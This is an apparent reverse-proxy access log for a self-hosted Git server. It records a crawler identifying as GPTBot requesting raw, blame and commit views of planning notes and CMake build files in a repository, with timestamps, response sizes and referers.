git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12891] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 1924] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11099] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14854] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:19:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14856] [Gzip 9.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9949] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12893] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12892] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" [Client 74.7.227.38] [Length 12893] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" +[17/Feb/2026:15:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" +[17/Feb/2026:15:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20373] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" +[17/Feb/2026:15:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20376] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" +[17/Feb/2026:15:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10023] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10024] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20384] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43162] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43160] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14639] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9983] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 